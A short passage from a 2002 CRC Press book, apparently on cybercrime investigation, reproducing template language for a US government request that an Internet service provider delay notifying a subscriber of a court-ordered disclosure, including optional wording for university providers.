Cover art courtesy of Greg Kipper.
[…] Providing prior notice to the subscriber or customer could seriously jeopardize the ongoing investigation, as such a disclosure would give the subscriber an opportunity to destroy evidence, change patterns of behavior, notify confederates, or flee or continue his flight from prosecution. [Optional Baker Act language to use if the ISP is a university: The United States further requests that [Internet Service Provider]’s compliance with the delayed notification provisions of this Order shall be deemed authorized under 20 U.S.C. § 1232g(b)(1)(j)(ii) (the “Baker Act”). See 34 CFR § 99.31 (a)(9)(i) (exempting requirement of prior notice for
©2002 CRC Press LLC
disclosures made to comply with a judicial order or lawfully issued subpoena where the disclosure is made pursuant to “any other subpoena issued for a law enforcement purpose and the court or other issuing agency has ordered that the existence or the contents of the subpoena or the information furnished in response to the subpoena not be disclosed”)].